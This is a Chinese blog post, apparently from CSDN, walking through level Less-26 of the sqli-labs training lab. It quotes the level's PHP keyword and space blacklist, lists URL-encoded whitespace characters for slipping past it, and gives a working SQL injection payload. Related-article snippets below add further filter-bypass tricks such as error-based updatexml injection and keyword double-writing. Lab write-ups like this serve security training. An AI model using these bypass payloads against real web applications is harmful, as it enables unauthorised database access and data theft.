sqli-labs————Less-26(绕空格、/*、#等)

最新推荐文章于 2023-10-21 15:54:58 发布
最新推荐文章于 2023-10-21 15:54:58 发布
阅读量2.2k 收藏
点赞数
分类专栏: 【渗透测试实战】 # Sqli-labs实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80285892
版权

Less-26

从这里的提示,我们可以看出这一关过滤了空格。
我们可以查看源代码,看看它的过滤机制:

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);		//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);		//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);	//Strip out slashes
	return $id;
}

注意:由于Windows下无法使用一些特殊字符来替换空格,所以这里为了更好的体验建议读者使用Linux下的环境。

从上面的过滤机制我们可以发现对“or”、“and”、“/*”、“#”、“--”“/”等特殊符号都进行了过滤,此处对于and和or的绕过方法就不再多说了,这里我们讲述几种技巧:

绕空格:

%09 TAB键(水平)
%0a 新建一行
%0c 新的一页
%0d return功能
%0b TAB键(垂直)
%a0 空格

在这一关中sql语句为:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

注意:对于注释和结尾字符我们只可以使用一个“ ’”来闭合后面的单引号。

下面给出一个payload:

http://192.168.11.136/sqli-labs/Less-26?id=1'%a0||'1'='1
读者可以自我在Linux环境中证实!


FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs ----less-26---37--练习
代码审计
03-07 928
sqli-labs————Less-26空格、/*、#等) 该关卡提示空格和注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
[网络安全]sqli-labs Less-26a 解题详析
等风来
10-21 2008
这一关sql语句执行抛出错误后并不在页面输出,所以排除报错注入。可猜测后端查询语句为。
sqli-less-26-less26a
沐目的博客
04-18 1026
less-26 单引号 GET型 这关就有点过滤的意思了,过滤了上一关的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。 数据库: -1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1 表: 1’|...
sqli-labs26
qq_53030229的博客
06-01 904
文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写过:anandd 大小写过And ASCII编码过 %20、%0a过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 一、审查源码 1、判断注入点和闭合方式 由于这个是与数据库交互的语句,通过这个判断
生命在于折腾——SQL注入的实操(六)less26-30
易水哲的博客
08-21 491
sql-lib项目,本篇文章介绍关卡26-30。
sqli-labs(26a)
weixin_30920853的博客
05-28 701
0x01偷偷看一波源码 和26关一样 闭合变成了’)而已 0X01构造语句爆库名 这是百度到的 第一个 ' 首先闭合id='$id' 中的',%a0是空格的意思,(ps:此处我的环境是ubuntu14.04+apache+mysql+php,可以解析%a0,此前在windows+wamp测试,不能解析%a0,有知情的请告知。)同时%0b也是可以通过测试的,其他的经测试是不行的。||是或者...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
安装sqli-labs
最新发布
10-22
sqli-labs靶场环境中,需要安装MySQL数据库以支持用户、菜单、漏洞等功能。 安装步骤 1. 下载靶场文件 首先,需要下载sqli-labs靶场文件。 2. 将靶场文件解压到WWW目录下 解压下载的靶场文件到WWW目录下,...
sqli-labs 26a
weixin_47300936的博客
09-04 630
mysql会将'2'当作true,然后true and true为true,true则为1。执行的语句则是where id = '2' and '1'='1'执行的语句则是where id = ('2' and '1'='1')后面依次判断出字段名为id,username,password。,查询语句即为where id = ('$id'),查询语句即为where id = '$id'由图可知,回显id为1的信息,即闭合为')即2' and '1'='1。回显会是id为2的信息。回显会是id为1的信息。
sql-lab 26~31总结(后续持续更新)(含参数污染解释)
m0_62879498的博客
01-15 717
sql-lab 26: 在一开始我们先尝试使用?id=1’ and 1=2 – q,发现 在注释过程中 and 和 – q都没有生效,说明它将我们的这些东西都给过滤除去 我们先观察它的源码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.or
sqli-labs ————less -26a
Fly_鹏程万里
05-16 1008
Less-26a查看一下源代码:查询语句:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace(...
sqli-labs (less-26 and less-26a)
kukudeshuo的博客
03-12 1165
sqli-labs (less-26 and less-26a) less-26 进入26关 这里我们直接查看源代码看过滤了哪些字符 我们发现,空格,or,and以及注释符–和#都没了 这里我们可以替换 替换:如and可替换为&&,or可替换为|| 空格的话我们可以 url 过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 mysql空白符:%09; %0A; %0B; %0D; %20; 先输入 http://127.0.0.1/sql1/Less-26/
sql-labs闯关26~31
qq_44663230的博客
09-03 2273
sql-labs闯关26-28a 29~31暂时不做
Sqli-Labs做题笔记:Less-21 - Less-26a
Forever_Han13的博客
01-23 525
过: 过滤关键字 穿插关键字过: select selselctect or oorr union ununionion 大小写转换: select SelECt or Or union uNIon 十六进制转换: select selec\x74 or o\x72 union unio\x6e 双重URL编码: select %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34
Sqli-labs less 26a
weixin_34032827的博客
08-11 632
Less-26a 这关与26的区别在于,sql语句添加了一个括号,同时在sql语句执行抛出错误后并不在前台页面输出。所有我们排除报错注入,这里依旧是利用union注入。 sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1 我们构造payload: http://127.0.0.1/sqllib/Less-26a/?id=100'...
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入恶意的 SQL 代码来执行未经授权的操作。通过利用这个漏洞,攻击者可以过应用程序的认证机制、获取敏感数据或者修改数据库中的内容。 在 Less-17 中,你将面对一个存在 SQL 注入漏洞的应用程序。你需要通过注入恶意的 SQL 代码来过应用程序的认证机制,以获取管理员权限。 注意:SQL 注入是一种非法行为,只能在合法的环境下进行学习和实验。在现实世界中,从事任何形式的黑客攻击都是违法行为,请始终遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值